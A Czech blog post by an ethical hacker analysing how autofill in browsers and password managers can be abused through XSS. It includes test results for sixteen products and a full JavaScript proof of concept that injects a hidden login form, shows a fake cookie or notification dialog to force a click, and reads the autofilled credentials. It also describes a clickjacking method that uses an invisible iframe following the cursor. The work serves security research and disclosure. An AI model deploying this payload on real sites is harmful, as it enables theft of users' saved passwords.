Článek vyšel na blogu Marka Tótha, etického hackera Avastu. Zde jej publikujeme se svolením autora. V IT bezpečnosti jsou v dnešní době velice oblíbeným tématem správci hesel. S používáním správců mohu jen souhlasit. Přeci jen, pamatovat si několik desítek unikátních hesel je skoro nemožné. Vy a počítač: Jak silnými hesly chráníte své důležité služby? Mnohdy již ale není zmíněna informace, že funkce automatického vyplňování by měla být vypnuta nebo alespoň nastavena na vyplňování pouze na žádost uživatele. Autofill spíše bývá označován jako užitečná funkce zajišťující pohodlné a „bezpečné“ přihlašování. Ano, pohodlné to je, ale na úkor bezpečnosti. Funkci automatického vyplňování má několik správců v základním nastavení zapnutou, a to i přesto, že se tím snižuje zabezpečení uložených údajů. Používá-li uživatel základní nastavení nebo se řídí doporučením od správce hesel, tak je možné do jednoho kliku myší získat uložený přihlašovací údaj u 11 ze 16 testovaných prohlížečů a správců hesel. Nemusí tedy dojít k úniku databáze/hesel na dané stránce, a i přesto získá útočník vaše údaje – vše v čitelné a nešifrované formě (v plaintextu). Automatické vyplňování může být dvou typů: automatické vyplňování bez uživatelské interakce (automatic autofill) a automatické vyplňování vyžadující uživatelskou interakci (kliknutí na údaj v UI ve správci hesel – manual autofill). V následující článku je termín autofill/automatické vyplňování vždy popisován jako automatické vyplňování bez uživatelské interakce.

Autofill / Automatické vyplňování Jak již název napovídá, tak tato funkce u správců hesel zajišťuje, že dojde k automatickému vyplnění údajů do přihlašovacího formuláře. Údaje jsou předvyplněny pouze u domén, u kterých došlo k jejich uložení. Chování autofillu závisí na mnoha faktorech. Kromě domény se ověřuje použitý protokol (http/https), atributy formuláře nebo třeba id a názvy prvků. Z bezpečnostního hlediska může tato funkce sloužit uživatelům k ověření, zda se nenacházejí na phishing stránce. V případě, že by se na ní nacházeli, tak by k automatickému vyplnění údajů nedošlo. Uživatelé by si mohli všimnout neobvyklého chování a mohli by si ověřit, na jaké doméně se právě nacházejí. Kromě „ověření“ phishing stránky se jedná spíše o funkci zajišťující pohodlné přihlašování, protože uživatel nemusí nikam klikat a má již vše předem předvyplněné. Předvyplněné údaje jsou ale problémem, protože všechna data jsou v čitelné formě (plaintextu) a mohou být přístupná pomocí javascriptu.

Autofill hesel u chromium-based prohlížečů U chromium-based prohlížečů (kromě Brave) funguje autofill funkce trochu jinak než například u Firefoxu nebo běžných správců hesel. V těchto prohlížečích dochází k doplnění údajů na první pohled zcela automaticky, ale není tomu tak. Údaje ve formuláři nejsou doopravdy vyplněné. K vyplnění dochází až v moment, kdy uživatel bude interagovat se stránkou. Uživatelská interakce musí být typu isTrusted (=> vyvolaná uživatelem) s událostí jako je stisk klávesy nebo klik myší. Mouseover, mousemove a podobně „jednodušší“ události plnohodnotný autofill neprovedou. Bude-li vypsán obsah inputu bez předchozí uživatelské interakce se stránkou, dojde k zobrazení pouze prázdné hodnoty. Pro ukázku jsem vytvořil script, který po 5 sekundách zobrazí obsah hodnot ve formuláři. <form action="/example.html"> <label for="username">Username</label><br> <input type="text" id="username" name="username"> <br> <label for="psw">Password</label><br> <input type="password" id="password" name="password"><br><br> <input type="submit" value="Submit"> </form> <script> window.setTimeout(function(){ var username = document.getElementById("username").value; var password = document.getElementById("password").value; alert(username+":"+password); }, 5000); </script> Jak autofill u chromium-based prohlížečů funguje můžete vidět na následujících animacích: 0-CLICK 1-CLICK Útočník musí tedy nějakým způsobem přimět uživatele, aby na stránce někam kliknul. V roli útočníka bych asi zobrazil notifikační nebo cookie dialog. Oba typy prvků se na stránkách zobrazují poměrně často, proto oběť nenabude podezření na podezřelou aktivitu. Cílem není, aby oběť někam přesně kliknula, ale aby byl nějaký klik proveden. Zobrazení prvku, který znepříjemňuje prohlížení webu, a pro jehož odstranění je nutné interagovat se stránkou, je za mě velice účinný způsob, jak od uživatele získat požadovaný klik.

Zneužití autofillu? Cross-Site Scripting (XSS) XSS je nejběžnější webová zranitelnost. Má-li webová stránka zranitelnost tohoto typu, tak je možné vložit do stránky vlastní javascriptový kód, který bude vykonávat akci definovanou útočníkem – například krádež přihlašovacích údajů. S použitím XSS se nabízí několik způsobů, jak ukrást přihlašovací údaje uživatele. Někoho by mohlo napadnout, že by v přihlašovacím formuláři zachytával zadané hodnoty nebo by změnil hodnotu form action (=adresa, kam se budou posílat údaje). K tomu bych měl pár doplňujících otázek: Co když XSS zranitelnost nebude na stejné stránce, kde se vyskytuje přihlašovací formulář?

Co když už je uživatel přihlášen, a tudíž přihlašovací formulář nebude k dispozici? Odpovědí by mohlo být, že by se uživateli zobrazil zcela nový přihlašovací formulář. V ideálním případě ještě se změnou frontendu, aby se vše tvářilo, že je odhlášen. Ano, asi by to mohlo fungovat, ale u tohoto způsobu bych se musel spolehnout na to, že oběť znovu zadá své údaje. Co když ale uživatel nový přihlašovací formulář nevyplní? Nejsem příznivec složité interakce od oběti. Chci-li po uživateli více než 2 běžné kliky myší, tak chci po uživateli už příliš hodně a přemýšlím nad jiným řešením. Mimo jiné, pokud bych chtěl po uživateli, aby se znovu přihlásil (zadal znovu údaje), tak v ten moment je to především založeno na sociálním inženýrství. Mým postupem by bylo zneužití funkce automatického vyplňování, kterou mají správci hesel. Pokud vím o XSS zranitelnosti, tak pomocí javascriptu vytvořím nový přihlašovací formulář, který bude uživateli zcela skryt. Správce detekuje výskyt tohoto formuláře a bude do něj automaticky doplňovat údaje. Cílem by tedy bylo využít chybného nastavení v používaném správci hesel. Výhody: Útok probíhá na pozadí

Žádná dodatečná interakce ze strany oběti nebo jen minimální – 1 klik

XSS zranitelnost může být kdekoliv na dané doméně, pro některé správce stačí i subdoména

Uživatel může být přihlášen i odhlášen Omezení: Uživatel musí mít uložené heslo pro danou doménu

Oběť musí používat automatický autofill ve správci hesel

Správce hesel nesmí být uzamčen/odhlášen Rozdíly v interakcích oběti mezi "XSS fake přihlašovací stránkou" a "XSS schovaným formulářem": XSS fake přihlašovací stránka: kliknutí do username inputu, zadání údajů, kliknutí do inputu hesla, zadání hesla = 4 akce od oběti

XSS schovaný formulář: 0 nebo 1 akce od oběti (maximálně 1 libovolné kliknutí)

Analýza prohlížečů a správců hesel V rámci analýzy jsem se zaměřil na nejpoužívanější prohlížeče a správce hesel. U password managerů bylo testováno pouze rozšíření do prohlížeče a vše bylo ověřováno ve verzi pouze pro počítač (především v Google Chrome). Na mobilních telefonech může tedy být chování zcela odlišné. Testované prohlížeče a správci hesel: Google Chrome 91.0.4472.124

Mozilla Firefox 89.0.2

Safari 14.1.1

Microsoft Edge 91.0.864.64

Opera 77.0.4054.172

Internet Explorer 11

Brave 1.26.74

Vivaldi 4.0.2312.36 LastPass 4.75.0

1Password 2.0.4

Bitwarden 1.51.0

Dashlane 6.2123.1

Roboform 9.2.3.0

Keeper 15.3.5

KeePassXC-Browser 1.7.8.1

Sticky Password 8.3.1.3 1) Prohlížeče a správci hesel ve výchozím nastavení Zapnutý autofill Nutná akce uživatele pro vyplnění údajů Akce uživatele Google Chrome Ano Ano Interakce se stránkou

(stisk klávesy, klik myší) Mozilla Firefox Ano Ne Safari Ne Ano Výběr z nabídky Microsoft Edge Ano Ano Interakce se stránkou

(stisk klávesy, klik myší) Opera Ano Ano Interakce se stránkou

(stisk klávesy, klik myší) Internet Explorer Ano Ne Brave Ne Ano Výběr z nabídky Vivaldi Ano Ano Interakce se stránkou

(stisk klávesy, klik myší) LastPass Ano Ne 1Password Ne Ano Výběr z UI doplňku Bitwarden Ne Ano Výběr z kontextového menu

Výběr z UI doplňku Dashlane Ano Ne Roboform Ne Ano Kliknutí na ikonu ve formuláři

Výběr z UI doplňku Keeper* Ano/Ne Ne/Ano KeePassXC-Browser Ne Ano Kliknutí na ikonu ve formuláři

(zranitelné na clickjacking)

Výběr z UI doplňku Sticky Password Ano Ne * Keeper se při prvním přihlášení ptá, zda má být pro danou doménu zapnutý autofill – „Ano“ je uživatelům zvýrazněno Prohlížeče Mozilla Firefox a Internet Explorer doplňují hesla zcela automaticky. Google Chrome a “chromium-based” prohlížeče (s výjimkou Brave) doplňují hesla až při interakci se stránkou. Celkově je možné získat heslo do jednoho kliku myší u 6 prohlížečů. Co se týče správců hesel, tak 3 správci mají autofill zapnutý už ve výchozím nastavení. U správce hesel Keeper uživatel potvrzuje dialog před prvním použitím uložených přihlašovacích údajů. Uživatel je dotázán, zda chce zapnout autofill pro konkrétní doménu. Znepokojivé je, že možnost ANO je zvýrazněna. Po odsouhlasení dialogu není v budoucnu uživatel znovu dotazován a údaje se doplňují zcela automaticky. U správců hesel s autofillem jsou údaje vyplňovány bez interakce se stránkou, tedy zcela automaticky a bez asistence uživatele. Budu-li počítat Keeper i momentálně zranitelný KeePassXC-Browser, tak do jednoho kliknutí je možné získat uložené heslo u 5 správců hesel. Chování autofillu závisí na Vašem používaném password manageru. U uživatele, který by používal na svá hesla pouze Brave prohlížeč, by k automatickému vyplnění údajů nedocházelo. V případě, že by měl uživatel Brave jen jako prohlížeč, a jako primárního správce hesel by používal například LastPass, tak v tu chvíli je chování prohlížeče ovlivněno správcem hesel. V případě doinstalovaného správce LastPass by tedy docházelo k automatickému vyplnění údajů i v Brave prohlížeči. 1.1) Automatické vyplňování u jiné URL a změněných atributů ve formuláři Údaje uloženy na: https://example.com

Jiná URL (jiná cesta/path): https://example.com/foo

Subdoména: https://subdomain.example.com Jiná URL:

stejné atributy Jiná URL:

jiné input id Jiná URL:

jiný input name Jiná URL:

jiný form action Jiná URL:

změna form action

až po načtení stránky Subdoména:

stejné atributy Google Chrome Ano Ano Ano Ano Ano Ne Mozilla Firefox Ano Ano Ano Ne Ano Ne Microsoft Edge Ano Ano Ano Ano Ano Ne Opera Ano Ano Ano Ano Ano Ne Internet Explorer Ano Ano Ano Ano Ano Ne Vivaldi Ano Ano Ano Ano Ano Ne LastPass Ano Ano Ne Varovný dialog Ano Ano Dashlane Ano Ano Ano Ano Ano Ne Keeper Ano Ano Ano Ano Ano Ne KeePassXC-Browser Ano Ano Ano Varovný dialog Ano Varovný dialog Sticky Password Ano Ano Ano Varovný dialog Ano Ano V případě útoku jsou nejdůležitější informace, jak se chová správce hesel při zobrazení formuláře na jiné URL, a také na subdoméně. Name, ID inputu nebo jiné atributy může útočník ovlivnit při vytvoření nového formuláře. Velice znepokojivé je, že u správců hesel LastPass a Sticky Password dochází k doplnění údajů, i když se jedná pouze o subdoménu. 1.2) Automatické vyplňování u subdomén Nově vytvořený formulář měl vždy stejné atributy jako formulář, kde byly údaje uloženy. Údaje uloženy na: https://subdomain.example.com

Stejná subdoména (jiná cesta/path): https://subdomain.example.com/foo

Jiná subdoména: https://subdomain2.example.com

Doména 4. řádu: https://foo.subdomain.example.com Stejná subdoména (jiná cesta) Jiná subdoména Doména 4. řádu Google Chrome Ano Ne Ne Mozilla Firefox Ano Ne Ne Microsoft Edge Ano Ne Ne Opera Ano Ne Ne Internet Explorer Ano Ne Ne Vivaldi Ano Ne Ne LastPass Ano Ano Ano Dashlane Ano Ne Ne Keeper Ano Ne Ne KeePassXC-Browser Ano Ne Varovný dialog Sticky Password Ano Ne Ano U správce hesel LastPass došlo k doplnění údajů i na zcela jiné subdoméně, než na které došlo k uložení. 2) Správci hesel s dodatečně zapnutým autofillem Mohou být uživatelé, kteří chtějí přejít z prohlížečového správce hesel na jiného, ale se zachováním stejného chování. Tedy, že se při použití jiného správce budou automaticky vyplňovat údaje tak, jak tomu bylo dosud. Rozhodnou se tedy zapnout tuto funkci v nastavení. Ze zbývajících správců hesel není možné nastavit autofill pro 1Password, Brave nebo Safari. Pro ostatní Bitwarden, KeePassXC-Browser a Roboform to možné je. Pokud je tato funkce pouze zapnuta, bez dalších změn, tak žádný ze správců nevyžaduje dodatečnou akci od uživatele – údaje se doplňují zcela automaticky. Bitwarden předem upozorňuje, že se jedná o „experimentální“ funkci. Informace, že se jedná o experimentální funkci je pro uživatele nicneříkající. Především pojem experimentální neznamená nebezpečná. Jediný správce, který upozorňuje na použití této funkce je KeePassXC-Browser 2.1) Automatické vyplňování u jiné URL a změněných atributů ve formuláři: Údaje uloženy na: https://example.com

Jiná URL (jiná cesta/path): https://example.com/foo

Subdoména: https://subdomain.example.com Testováno bylo pouze zapnutí funkce. Další nastavení nebylo změněno, např. shoda URL a jiné. Jiná URL:

stejné atributy Jiná URL:

jiné input id Jiná URL:

jiný input name Jiná URL:

jiný form action Jiná URL:

změna form action

až po načtení stránky Subdoména:

stejné atributy Bitwarden Ano Ano Ano Ano Ano Ano Roboform Ano Ano Ano Ano Ano Ano KeePassXC-Browser Ano Ano Ano Varovný dialog Ano Varovný dialog Po zapnutí autofill funkce (bez dalšího nastavení) došlo ke snížení bezpečnosti uloženého hesla. Příkladem je Bitwarden nebo RoboForm, kteří začali doplňovat údaje i na subdoméně. 2.2) Automatické vyplňování u subdomén Nově vytvořený formulář měl vždy stejné atributy jako formulář, kde byly údaje uloženy. Údaje uloženy na: https://subdomain.example.com

Stejná subdoména (jiná cesta/path): https://subdomain.example.com/foo

Jiná subdoména: https://subdomain2.example.com

Doména 4. řádu: https://foo.subdomain.example.com Stejná subdoména (jiná cesta) Jiná subdoména Doména 4. řádu Bitwarden Ano Ano Ano Roboform Ano Ano Ano KeePassXC-Browser Ano Ne Varovný dialog Bitwarden a RoboForm začali doplňovat údaje i na zcela jiné subdoméně, než na které došlo k uložení.

Limitace Pro úspěšný útok je kromě zapnuté autofillu nutné splnit ještě další podmínky. Velice limitující může být je-li uloženo více přihlašovacích údajů pro konkrétní doménu. Má-li totiž uživatel uloženo více údajů, tak někteří správci neví, jaký údaj mají vyplnit. Nějaký správce vyplňuje posledně použitý údaj, a některý zas dá uživateli na výběr, jaké údaje chce doplnit, čímž se znemožní automatické vyplnění. Autofill u 2 a více uložených údajů Google Chrome Ano – naposledy použitý údaj Mozilla Firefox Ne Safari ---- Microsoft Edge Ano – naposledy použitý údaj Opera Ano – naposledy použitý údaj Internet Explorer Ne Brave ---- Vivaldi Ano – naposledy použitý údaj LastPass Ano – naposledy použitý údaj 1Password ---- Bitwarden Ano – naposledy použitý údaj

(zapnutý autofill) Dashlane Ano/Ne* Roboform Ne

(zapnutý autofill) Keeper Ne KeePassXC-Browser Ne

(zapnutý autofill) Sticky Password Ne *Uživatel, který v aktuálním tabu již jednou vybral přihlašovací údaje, tak ANO. Ve zcela novém tabu NE. Další omezení: Dochází ke krádeži pouze jedné uložené hodnoty pro konkrétní doménu. LastPass: K autofillu dochází jen u hesel, které byly uloženy po úspěšném přihlášení Keeper Při prvním přihlášení se ptá, zda má být pro danou doménu zapnutý autofill – „Ano“ je uživatelům zvýrazněno

Po odsouhlasení se v budoucnu znovu neptá a údaje rovnou vyplňuje

Skript a demo Každý správce hesel kontroluje výskyt přihlašovacího formuláře trochu jinak. Pro jednoho správce musí být formulář pro uživatele viditelný, pro dalšího může být formulář zcela schován. Limity, s kterými jsem se setkal při psaní skriptu: Chromium-based uživatel musí interagovat se stránkou

formulář může být úplně schován ( display:none ) Dashlane nelze použít display:none

formulář musí mít minimální opacity 0.2

formulář musí být v uživatelsky viditelném prostoru (nemůže být např. left: -1000px )

) ve výchozím nastavení provádí autologin (autosubmit) Keeper nelze použít display:none

formulář může mít opacity:0

ve výchozím nastavení provádí autologin (autosubmit) Sticky Password nelze použít display:none nebo opacity:0 , ale lze použít opacity:0.000001

nebo , ale lze použít formulář nemusí být v uživatelsky viditelném prostoru – lze zadat jen velkou hodnotu pro right a bottom (nemůže být např. left: -1000px , ale bottom:-1000px je v pořádku)

, ale je v pořádku) ve výchozím nastavení provádí autologin (autosubmit) Bitwarden nelze použít display:none nebo opacity:0 , ale lze použít opacity:0.000001

nebo , ale lze použít formulář musí být v uživatelsky viditelném prostoru "Bypass", který řeší viditelnost formuláře: Formuláři je nutné nastavit: position: fixed; bottom: -{výška vytvořeného formuláře-X}px;

X = minimální viditelná část pro správce hesel, např. Bitwarden:3.0001 (větší než 3), Dashlane:2 Nově vytvořený formulář bude okrajově viditelný maximálně na 1,5 sekundy. Správce hesel takto viditelný formulář detekuje a doplní údaje. Výsledný skript (pro Red Team/etické účely): I přes množství limitů jsem vytvořil skript, který je na testovací stránce použitelný pro všechny správce, kteří mají autofill zapnutý ve výchozím nastavení. Skript funguje i pro správce, u kterých došlo k dodatečnému zapnutí autofillu. Na začátku je možné definovat, jaký dialog chci uživateli zobrazit (kvůli vynucení kliku). Také je možné nastavit, zda má být za dialogem overlay (pro zhoršení čitelnosti webu) nebo jestli má být zablokováno scrollování. Při vytváření nového formuláře není nutné kopírovat styly (class) z originálního formuláře. Pokud je skript vložen do stránky, kde se originální přihlašovací formulář již vyskytuje, tak je nutné prvně u tohoto originální formuláře změnit všechny identifikační atributy. Bez této změny by správce hesel mohl mít problém s vyplněním údajů do nově vytvořeného formuláře. Došlo by totiž k situaci, že by se na stránce vyskytovaly 2 zcela stejné formuláře. Popis skriptu: Je vytvořen nový formulář, který je shodný s formulářem, kde byly uloženy údaje. Nový formulář obsahuje onchange() událost. Změní-li se obsah formuláře (doplnění údajů), tak dojde k získání hodnot document.getElementById("username").value a document.getElementById("password").value . Používá-li uživatel správce hesel (mimo chromium-based prohlížečů), tak není potřeba interagovat se stránkou. Prvně se tedy kontroluje, zda již nejsou v nově vytvořeném formuláři vyplněná data. Pokud do 1500 ms nedošlo k doplnění údajů, tak se zobrazí uživateli notifikační nebo cookie dialog, kterým se vynutí klik od uživatele. Vynucením kliku dojde k doplnění údajů u chromium-based prohlížečů. var overlay = "yes"; // yes, no var scrolling = "no"; // yes, no var dialog = "notification"; // notification, cookie createLoginForm(); window.setTimeout(function(){ hideLoginForm(); // function especially for chromium-based browsers // show notification or cookie dialog that require a user interaction if (!!window.chrome && !document.getElementById("password").value) { showDialog(); addDialogEvents(); } }, 1500); function createLoginForm() { var divlogin = document.createElement("div"); divlogin.style = "position: fixed; bottom: -19.9999px; z-index: 2147483647; opacity:0.2"; divlogin.id = "divlogin"; divlogin.innerHTML = ' \ <form method="POST" action="login.html" id="form" onchange="getFormValues()"> \ <input type="text" id="username" name="username" autocomplete=on required> \ <input type="password" id="password" name="password" autocomplete=on required> \ <button type="submit" id="submit">Login</button> \ </form>'; document.body.appendChild(divlogin); } // remove submit button to prevent autosubmit feature in password managers function removeSubmitButton() { if (document.getElementById("submit")) { var element = document.getElementById("form"); var child = document.getElementById("submit"); element.removeChild(child); } } function hideLoginForm() { divlogin.style.display = "none"; } function getFormValues() { usr=document.getElementById("username").value; pw=document.getElementById("password").value; if (usr && pw) { removeSubmitButton(); hideLoginForm(); alert(usr+":"+pw); } } function showDialog() { var overlaydiv = ""; var boxshadow = ""; var dialogdiv = document.createElement("div"); if (overlay == "yes") { overlaydiv = '<div id="overlay"></div>'; boxshadow = 'box-shadow:0 1px 12px rgb(5 27 44 / 33%), 0 2px 32px rgb(5 27 44 / 48%) !important;'; } else { boxshadow = 'box-shadow:0 1px 6px rgb(5 27 44 / 6%), 0 2px 32px rgb(5 27 44 / 16%) !important;'; } if (dialog == "cookie") { dialogdiv.innerHTML = '<style>.no-scroll {overflow: hidden;} #overlay {position: fixed; display: block; width: 100%; height: 100%; top: 0; left: 0; right: 0; bottom: 0; background-color: rgba(0,0,0,0.5); z-index: 225859400; animation: .5s showoverlay; } #overlay.remove-overlay {animation: .5s hideoverlay; opacity: 0; } @keyframes showoverlay {from { opacity: 0; } to { opacity: 1; } } @keyframes hideoverlay {from { opacity: 1; } to { opacity: 0; } } #cookie-dialog {display: block!important; position: relative!important; opacity: 1!important; visibility: visible!important; margin: 290px auto 0!important; width: 650px!important; -webkit-box-sizing: content-box!important; -moz-box-sizing: content-box!important; box-sizing: content-box!important; max-width: 90%!important; background: #ffffff!important; padding: 12px 24px!important; overflow: hidden!important; z-index: 9999!important; border: 10px solid #5fa624!important; box-shadow: #333 1px 1px 10px 1px!important; line-height: 1.2!important; text-align: left!important; } #cookie-div {font-family: Arial,serif!important;width: 100%!important;height: 100%!important;margin: 0 auto!important;position: fixed!important;top: 0!important;left: 0!important;font-family: Arial,serif!important;z-index: 2258594000!important;overflow-y: auto!important;} #cookie-dialog h2 {font-size: 20px!important; line-height: 16px!important; font-weight: 700!important; margin: 10px 0 16px!important; } #cookie-dialog p {margin: 12px 0!important; line-height: 16px!important; text-indent: 0!important; font-weight: 400!important; font-size: 10pt!important; } #cookie-dialog #button-row {display: flex!important; flex-wrap: nowrap!important; justify-content: space-between!important; margin-right: 265px!important; } .btn {border: 1px solid #000000!important; font-family: Arial,serif!important; color: #000000!important; background: #ffffff!important; padding: 7px 10px!important; text-decoration: none!important; } #cookie-dialog #accept-all {border: none!important; color: #ffffff!important; background: #5fa624!important; text-decoration: none!important; } #links {display: flex!important; font-size: 12px!important; margin-top: 20px!important; } #cookie-dialog a {color: #5fa624!important; text-decoration: none!important; } #cookie-dialog a:hover {cursor: pointer!important; } .bar {margin: 0 5px!important; width: auto!important; height: auto!important; position: relative!important; } #accept-all:hover {cursor: pointer!important; background: #5fa624!important; text-decoration: none!important; } .btn:hover {cursor: pointer!important; background: #ffffff!important; text-decoration: none!important; }</style> \ '+overlaydiv+'<div id="cookie-div"><div id="cookie-dialog"> <div> <h2>Privacy & Transparency</h2> <p>We and our partners use cookies to Store and/or access information on a device. We and our partners use data for Personalised ads and content, ad and content measurement, audience insights and product development. An example of data being processed may be a unique identifier stored in a cookie. Some of our partners may process your data as a part of their legitimate business interest without asking for consent. To view the purposes they believe they have legitimate interest for, or to object to this data processing use the vendor list link below. The consent submitted will only be used for data processing originating from this website. If you would like to change your settings or withdraw consent at any time, the link to do so is in our privacy policy accessible from our home page.</p><p><span id="button-row"><button class="btn">Manage Settings</button><button id="accept-all" class="btn" style="color: rgb(255, 255, 255) !important;">Continue with Recommended Cookies</button> </span> </p> <div id="links"> <a href="javascript:void(0);">Vendor List</a> <span class="bar">|</span><a href="javascript:void(0);">Privacy Policy</a></div></div></div></div>'; } else { dialogdiv.innerHTML = '<style>.no-scroll {overflow: hidden;} #overlay {position: fixed; display: block; width: 100%; height: 100%; top: 0; left: 0; right: 0; bottom: 0; background-color: rgba(0,0,0,0.5); z-index: 225859400; animation: .5s showoverlay; } #overlay.remove-overlay {animation: .5s hideoverlay; opacity: 0; } @keyframes showoverlay {from { opacity: 0; } to { opacity: 1; } } @keyframes hideoverlay {from { opacity: 1; } to { opacity: 0; } } #notification-container #notification-dialog .button {box-sizing: border-box; padding: 0.75em 1.5em; font-size: 1em; border-radius: .25em; font-weight: 400; box-shadow: unset; display: -ms-flexbox; display: flex; float: right; position: relative; line-height: 1.5; text-align: center; white-space: nowrap; vertical-align: middle; cursor: pointer; -webkit-user-select: none; font-family: inherit; letter-spacing: 0.05em; margin: 0; border: 1px solid transparent; } #notification-container #notification-dialog .button.secondary {box-shadow: none; background: white !important; color: #0078D1 !important; margin-right: 0.714em; } #notification-container #notification-dialog .sizing {display: block; -webkit-backface-visibility: initial !important; backface-visibility: initial !important; } #notification-container #notification-dialog .notification-body-message {box-sizing: border-box; padding: 0 0 0 1em; font-weight: 400; float: left; width: calc(100% - 80px); line-height: 1.45em; -o-user-select: none; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; cursor: default; color: #051B2C !important; } #notification-container #notification-dialog .notification-body-icon img.icon {width: 45px; top: 3px; left: 50%; transform: translateX(-50%); position: absolute; height: 45px; } #notification-container #notification-dialog .notification-body-icon {box-sizing: border-box; float: left; width: 80px; height: 80px; position: relative; } #notification-container #notification-dialog .notification-body {box-sizing: border-box; margin: 0; } #notification-container #notification-dialog {width: 500px; box-sizing: border-box; max-width: 100%; margin: 0 auto; '+boxshadow+' background: white !important; color: #051b2c; padding: 1.5em 1.5em; border-bottom-left-radius: 0.5em; border-bottom-right-radius: 0.5em; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Seoe UI Symbol"; } #notification-container {font-size: 16px; position: fixed; z-index: 2258594000; left: 0; right: 0; -webkit-font-smoothing: initial; } #notification-container.slide-down {top: 0; } #notification-dialog .sizing {content: ""; display: block; height: 0; clear: both; } #notification-container #notification-dialog .button.primary {background: #0078D1; color: white !important; } #notification-container #notification-dialog .button.primary:hover {background: #0062ab; } #notification-container.slide-down #notification-dialog {-webkit-animation-name: animationDown; -webkit-animation-iteration-count: 1; -webkit-animation-timing-function: ease-out; -webkit-animation-duration: 400ms; -webkit-animation-fill-mode: forwards; animation-name: animationDown; animation-iteration-count: 1; animation-timing-function: ease-out; animation-duration: 400ms; animation-fill-mode: forwards; -webkit-font-smoothing: initial; } #notification-container.slide-up {-webkit-animation-name: animationUp; -webkit-animation-iteration-count: 1; -webkit-animation-timing-function: ease-out; -webkit-animation-duration: 500ms; -webkit-animation-fill-mode: forwards; animation-name: animationUp; animation-iteration-count: 1; animation-timing-function: ease-out; animation-duration: 500ms; animation-fill-mode: forwards; } @keyframes animationUp {0% {transform: translateY(0%); } 100% {transform: translateY(-150%); } } @keyframes animationDown {0% {transform: translateY(-150%); } 100% {transform: translateY(0); }}</style> \ '+overlaydiv+'<div id="notification-container" class="notification-container slide-down"><div id="notification-dialog" class="notification-dialog"><div class="notification-body" id="notification-body"><div class="notification-body-icon"><img class="icon" alt="Klepněte pro větší obrázek" src=\'data:image/svg+xml,%3Csvg fill="none" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 40 40"%3E%3Cg clip-path="url(%23clip0)"%3E%3Cpath fill-rule="evenodd" clip-rule="evenodd" d="M33.232 28.434a2.5 2.5 0 001.768.733 1.667 1.667 0 010 3.333H5a1.667 1.667 0 110-3.333 2.5 2.5 0 002.5-2.5v-8.104A13.262 13.262 0 0118.333 5.122V1.667a1.666 1.666 0 113.334 0v3.455A13.262 13.262 0 0132.5 18.563v8.104a2.5 2.5 0 00.732 1.767zM16.273 35h7.454a.413.413 0 01.413.37 4.167 4.167 0 11-8.28 0 .417.417 0 01.413-.37z" fill="%23BDC4CB"/%3E%3C/g%3E%3Cdefs%3E%3CclipPath id="clip0"%3E%3Cpath fill="%23fff" d="M0 0h40v40H0z"/%3E%3C/clipPath%3E%3C/defs%3E%3C/svg%3E\'></div><div class="notification-body-message">We\'d like to send you notifications for the latest news and updates.</div><div class="sizing"></div></div><div id="buttons"><button class="primary button">Allow</button><button class="secondary button">Cancel</button><div class="sizing"></div></div></div></div>'; } document.body.appendChild(dialogdiv); if (scrolling == "no") { document.getElementsByTagName("body")[0].classList.add("no-scroll"); } } function addDialogEvents() { window.addEventListener('click', function(){ if (overlay == "yes") { hideOverlay(); } if (scrolling == "no") { document.getElementsByTagName("body")[0].classList.remove("no-scroll"); } if (dialog == "cookie") { document.getElementById("cookie-div").style.display = "none"; } else { hideDialog(); } }); window.addEventListener('keydown', function(){ if (overlay == "yes") { hideOverlay(); } if (scrolling == "no") { document.getElementsByTagName("body")[0].classList.remove("no-scroll"); } if (dialog == "cookie") { document.getElementById("cookie-div").style.display = "none"; } else { hideDialog(); } }); } function hideDialog() { document.getElementById("notification-container").classList.add("slide-up"); } function hideOverlay() { var x = document.getElementById("overlay"); x.classList.add("remove-overlay"); window.setTimeout(function(){ x.style.display = "none"; }, 500); } Demo Přihlašovací formulář pro uložení hesla: https://websecurity.dev/password-managers/login/

Testovací stránka se skriptem: https://websecurity.dev/password-managers/autofill/ Google Chrome – nutná uživatelská interakce LastPass – uložené heslo po přihlášení se automaticky doplňuje

Clickjacking KeePassXC-Browser V prvotní tabulce k autofillu (tabulka) jsem označil, že je KeePassXC-Browser zranitelný na clickjacking. Během testování autofillu jsem u KeePassXC-Browser zjistil, že vyplňuje údaje při jednom kliknutí na ikonu v inputu. Jednoho kliknutí využívám i u chromium-based prohlížečů, a tak jsem doplnil tuto analýzu i o tuto zranitelnost. Jeden klik by nebyl samostatný důvod ke zranitelnosti. Problémem je rozdílné chování při vytvoření neviditelného formuláře a při zobrazení formuláře v neviditelném rámu ( <iframe> ). U správce hesel KeePassXC-Browser dochází ve výchozím nastavení k doplnění hesla až po kliknutí na ikonu Je-li vytvořen nový formulář s opacity:0.2 , tak je ikona stále stejně viditelná Pokud je ale formulář v iframu a tento iframe má opacity:0.2 , tak v rámu je ikona průhledná => možnost zneviditelnit ikonu Útočníkovi poté stačí umístit neviditelný iframe na místo, kam uživatel klikne. V případě mnou vytvořeného skriptu to může být kliknutí na cookie nebo notifikační dialog. Kromě umístění iframu na tlačítka v dialogu je vhodný i další způsob – iframe pod kurzorem myši. Konkrétně by se jednalo o iframe, který by sledoval pozici kurzoru. Iframe by měl velikost přesně jako ikona KeePassXC-Browser a obsah v iframu by byl přesně napozicován na ikonu. V tomto případě, ať by uživatel kamkoliv kliknul, tak by došlo ke kliknutí na ikonu – tedy k doplnění údajů ve formuláři v iframu. Iframe nastaven na opacity:1 Iframe nastaven na opacity:0 Popis skriptu: Pomocí XSS zranitelnosti se vytvoří nový formulář na stránce Vytvoří se iframe, který bude načítat stejnou stránku -> v iframu bude mnou vytvořený formulář Pro iframe nastavím průhlednost ( opacity:0 ), a také velikost, která bude shodná s velikostí ikony Obsah v iframu bude napozicován na nově vytvořený formulář – na pozici ikony Iframe bude sledovat pohyb myši a bude umístěn pod kurzorem Demo (neviditelná ikona) Přihlašovací formulář pro uložení hesla: https://websecurity.dev/password-managers/login/

